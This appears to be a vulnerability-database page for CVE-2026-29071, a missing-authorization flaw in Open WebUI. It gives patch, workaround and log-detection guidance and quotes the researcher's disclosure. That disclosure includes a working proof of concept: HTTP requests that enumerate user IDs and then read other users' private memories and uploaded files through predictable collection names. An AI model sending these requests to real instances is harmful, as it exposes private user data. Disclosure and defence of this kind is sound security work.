CVE-2026-29071 — LOW (CVSS 3.1)

Q: Is CVE-2026-29071 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-29071, increasing the risk of exploitation.

Q: How to fix CVE-2026-29071?

1. PATCH: Upgrade to open-webui 0.8.6 which adds ownership validation on collection queries. 2. VERIFY: Confirm your running version with 'pip show open-webui' or the /api/version endpoint. 3. INTERIM WORKAROUND (if patching is delayed): Restrict /api/v1/retrieval/query/collection and /api/v1/users/search to admin roles via reverse-proxy ACLs (nginx/Traefik location blocks). 4. DETECTION: Query your access logs for POST requests to /api/v1/retrieval/query/collection where collection_names contains 'user-memory-' followed by a UUID that does not match the authenticated user's ID. 5. SCOPING: Audit whether the Memory experimental feature was enabled; if so, treat exposed memory content as a potential data breach and review what users had stored.

Q: What systems are affected by CVE-2026-29071?

This vulnerability affects the following AI/ML architecture patterns: AI chat interfaces, RAG pipelines, vector databases, agent frameworks, multi-tenant LLM deployments.

Q: What is the CVSS score for CVE-2026-29071?

CVE-2026-29071 has a CVSS v3.1 base score of 3.1 (LOW). The EPSS exploitation probability is 0.01%.

CISO Take

Any authenticated user on Open WebUI <= 0.8.5 can read other users' private AI memories and uploaded documents by guessing predictable collection names — no admin privileges needed. User enumeration via /api/v1/users/search hands attackers the UUIDs required to target specific accounts, including admins. Upgrade to 0.8.6 immediately; if you cannot patch, firewall the /api/v1/retrieval/query/collection and /api/v1/users/search endpoints to admin roles only.

What is the risk?

CVSS 3.1 rates this Low (3.1), but that score underweights the sensitivity of AI-specific data. Personal memories stored for LLM personalization can contain business-sensitive context, confidential prompts, and strategic information — data users explicitly expect to be private. The exploit is trivial: predictable naming patterns (user-memory-{UUID}) and an open user-enumeration endpoint mean any registered user can chain two API calls to exfiltrate any other user's memory corpus. Exposure is highest in multi-tenant Open WebUI deployments (shared team instances, SaaS-style setups) where trust boundaries between users matter.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
open-webui	pip	<= 0.8.5	`0.8.6`
136.3K Pushed 4d ago 61% patched ~8d to patch Full package profile →

Do you use open-webui? You're affected.

Severity & Risk

CVSS 3.1

3.1 / 10

EPSS

0.0%

chance of exploitation in 30 days

Higher than 2% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC High

PR Low

UI None

S Unchanged

C Low

I None

A None

What should I do?

5 steps

PATCH

Upgrade to open-webui 0.8.6 which adds ownership validation on collection queries.
VERIFY

Confirm your running version with 'pip show open-webui' or the /api/version endpoint.
INTERIM WORKAROUND (if patching is delayed): Restrict /api/v1/retrieval/query/collection and /api/v1/users/search to admin roles via reverse-proxy ACLs (nginx/Traefik location blocks).
DETECTION

Query your access logs for POST requests to /api/v1/retrieval/query/collection where collection_names contains 'user-memory-' followed by a UUID that does not match the authenticated user's ID.
SCOPING

Audit whether the Memory experimental feature was enabled; if so, treat exposed memory content as a potential data breach and review what users had stored.

CISA SSVC Assessment

Decision Track*

Exploitation poc

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Auth Bypass Data Extraction Privacy Violation RAG Agent Framework AML.T0012 - Valid Accounts AML.T0049 - Exploit Public-Facing Application AML.T0057 - LLM Data Leakage AML.T0085.000 - RAG Databases AML.T0087 - Gather Victim Identity Information

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 10 - Data and data governance

ISO 42001

A.7.3 - Data governance for AI systems

NIST AI RMF

PROTECT 2.2 - Mechanisms to achieve conditions of AI trustworthiness

OWASP LLM Top 10

LLM06 - Sensitive Information Disclosure

Frequently Asked Questions

What is CVE-2026-29071?

Any authenticated user on Open WebUI <= 0.8.5 can read other users' private AI memories and uploaded documents by guessing predictable collection names — no admin privileges needed. User enumeration via /api/v1/users/search hands attackers the UUIDs required to target specific accounts, including admins. Upgrade to 0.8.6 immediately; if you cannot patch, firewall the /api/v1/retrieval/query/collection and /api/v1/users/search endpoints to admin roles only.

Is CVE-2026-29071 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-29071, increasing the risk of exploitation.

How to fix CVE-2026-29071?

1. PATCH: Upgrade to open-webui 0.8.6 which adds ownership validation on collection queries. 2. VERIFY: Confirm your running version with 'pip show open-webui' or the /api/version endpoint. 3. INTERIM WORKAROUND (if patching is delayed): Restrict /api/v1/retrieval/query/collection and /api/v1/users/search to admin roles via reverse-proxy ACLs (nginx/Traefik location blocks). 4. DETECTION: Query your access logs for POST requests to /api/v1/retrieval/query/collection where collection_names contains 'user-memory-' followed by a UUID that does not match the authenticated user's ID. 5. SCOPING: Audit whether the Memory experimental feature was enabled; if so, treat exposed memory content as a potential data breach and review what users had stored.

What systems are affected by CVE-2026-29071?

This vulnerability affects the following AI/ML architecture patterns: AI chat interfaces, RAG pipelines, vector databases, agent frameworks, multi-tenant LLM deployments.

What is the CVSS score for CVE-2026-29071?

CVE-2026-29071 has a CVSS v3.1 base score of 3.1 (LOW). The EPSS exploitation probability is 0.01%.

Technical Details

NVD Description

### Summary Any authenticated user can read other users' private memories via `/api/v1/retrieval/query/collection` ### Details **Vulnerability 1: Missing authorization in collection querying** In `backend/open_webui/routers/retrieval.py`, the `query_collection_handler` function accepts a list of `collection_names` but performs no ownership validation: ```python async def query_collection_handler( request: Request, form_data: QueryCollectionsForm, user=Depends(get_verified_user), # Only checks authentication, not authorization ): ``` Collection names follow predictable patterns: - User files: `file-{FILE_UUID}` - User memories: `user-memory-{USER_UUID}` (requires Memory experimental feature) ### PoC **Environment:** Open WebUI v0.8.3, default configuration. **Setup:** 1. Register two users: admin (first user) and attacker (second user). 2. As admin, upload a PDF document through chat. 3. As admin, enable Memory (Settings → Personalization → Memory) and add some memories. **Exploitation — Step 1: Enumerate all users** ``` GET /api/v1/users/search HTTP/1.1 Host: <target> Authorization: Bearer <attacker_token> ``` Response reveals all users including admin's UUID, email, and role: ```json { "users": [ { "id": "1e4756eb-b064-4781-8b06-4979bca59c8b", "name": "user", "email": "user@test.com", "role": "user" }, { "id": "81d2f94a-3dfb-479c-af98-e29f0f40c4ba", "name": "admin", "email": "admin@test.com", "role": "admin" } ] } ``` <img width="1340" height="731" alt="1poc - users" src="https://github.com/user-attachments/assets/46d1cb64-2f84-480e-b887-819008ddabc9" /> **Exploitation — Step 2: Read admin's memories** Using the admin UUID obtained in Step 1, query their private memory collection: ``` POST /api/v1/retrieval/query/collection HTTP/1.1 Host: <target> Authorization: Bearer <attacker_token> Content-Type: application/json { "collection_names": ["user-memory-<admin_UUID_from_step_1>"], "query": "test" } ``` Response returns admin's private memories: ```json { "documents": [["User is testing IDOR", "User - Mariusz, security researcher"]] } ``` <img width="1285" height="606" alt="2poc - memory" src="https://github.com/user-attachments/assets/eac7c129-dcad-4afd-9449-2ca93b19e082" /> **Note:** Step 2 requires the Memory experimental feature to be enabled. Steps 1 and 3 work on default configuration. **Exploitation — Step 3: Read admin's private file (Vulnerability 1)** File collections use the pattern `file-{FILE_UUID}`. The file UUID must be obtained separately. Once known: ``` POST /api/v1/retrieval/query/collection HTTP/1.1 Host: <target> Authorization: Bearer <attacker_token> Content-Type: application/json { "collection_names": ["file-<file_UUID>"], "query": "test" } ``` Response returns admin's private document content and full metadata: ```json { "documents": [["Test PDF \nabc \nbcd"]], "metadatas": [[{ "name": "Test PDF.pdf", "author": "Mariusz Maik", "created_by": "81d2f94a-3dfb-479c-af98-e29f0f40c4ba", "file_id": "243bee10-49ad-466f-884b-67b6b3d74968" }]] } ``` <img width="1413" height="908" alt="image" src="https://github.com/user-attachments/assets/43041261-ec98-4f3f-8c26-a0c63ef18596" /> ### Impact - **Document theft:** Any authenticated user can read the full content and metadata of files uploaded by any other user, including admins. - **User enumeration:** All user UUIDs, emails, names, and roles are exposed to any authenticated user via `/api/v1/users/search`. - **Memory leakage:** When the Memory experimental feature is enabled, personal memories stored by users for LLM personalization can be read by any other user — directly contradicting the official documentation. - **No admin privileges required:** A regular user account is sufficient to exploit all of the above. ### Suggested Fix **1. Add ownership validation in `/api/v1/retrieval/query/collection`:** ```python async def query_collection_handler( request: Request, form_data: QueryCollectionsForm, user=Depends(get_verified_user), ): for collection_name in form_data.collection_names: if collection_name.startswith("user-memory-"): owner_id = collection_name.replace("user-memory-", "") if owner_id != user.id and user.role != "admin": raise HTTPException(status_code=403, detail="Access denied") elif collection_name.startswith("file-"): file_id = collection_name.replace("file-", "") # user_has_access_to_file — placeholder; verify file ownership # e.g. check if created_by matches user.id if not user_has_access_to_file(user.id, file_id): raise HTTPException(status_code=403, detail="Access denied") ``` **2. Restrict `/api/v1/users/search`** to admin-only or limit the fields returned to non-privileged users. ### Disclosure AI was used to assist with writing this report. The vulnerability was identified and confirmed through hands-on testing on Open WebUI v0.8.3. All screenshots are from real testing.

Exploitation Scenario

An attacker registers a standard user account on a shared Open WebUI instance (e.g., a company's internal AI assistant portal). They call GET /api/v1/users/search to obtain the full user list including admin UUIDs and emails. They then POST to /api/v1/retrieval/query/collection with collection_names set to 'user-memory-{admin_UUID}' and a broad query term. The response returns the admin's accumulated AI memory — potentially containing system prompts, business context, client names, or internal project details the admin fed to the LLM for personalization. The entire operation requires no elevated privileges and leaves minimal trace beyond standard API access logs.